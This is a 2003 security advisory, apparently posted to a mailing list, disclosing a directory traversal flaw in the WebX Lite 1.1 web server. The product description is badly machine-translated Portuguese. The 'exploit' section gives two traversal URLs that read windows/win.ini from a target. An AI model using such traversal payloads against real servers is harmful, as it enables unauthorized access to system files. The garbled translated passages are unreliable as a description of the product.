olá,
eu estou enviando você uma segurança consultiva para WebX lite 1.1 web server.
----
-=- Freedom of Voice - Freedom of Choice =-
------------------------------------------------------------------
http://members.lycos.co.uk/r34ct/ security advisory
------------------------------------------------------------------

dr_insane - [email protected]
September 8, 2003

Vunerability:
----------------
1) Directory Traversal attacks
Product:
--------
WebX Lite 1.1 web server
WebX 1.1 web server
Description of product:
-----------------------
Usando WebX Lite não podia estar mais simples. Primeiro conjunto os parâmetros básicos de um servidor de web, escolhe a Porta De Servidor e o Caminho Virtual onde você web pages são localizadas. Então começo o servidor. Que é isto.
Você pode facilmente somar web baseada administration/configuration, acesso de cliente, e relatando recursos para aplicações existentes enquanto reusing subroutines existente, funciona e classes. E a melhor parte, você pode fazer todo este enquanto ainda trabalhando no ambiente de desenvolvimento de sua escolha, seja isto é Basic Visual, Visual C++, Delphi, ou qualquer ambiente que suporta ActiveX controls.VUNERABILITY / EXPLOIT
======================
where to start...1) http://[target]/../../../../../../../../../../windows/win.ini
2)http://[target]/.../.../.../.../.../.../.../windows/win.iniLocal:
------
not realy
Remote:
-------
real bad

Vendor Fix:
-----------
Not yet
Vendor Contact:
---------------
http://www.futurewavetech.com/
[email protected]:
--------
dr_insane
http://members.lycos.co.uk/r34ct/_______________________________________________
----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------
______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones!
http://www.pathfinder.gr - ÄùñåÜí mail áðü ôïí Pathfinder!

Cracks's S.A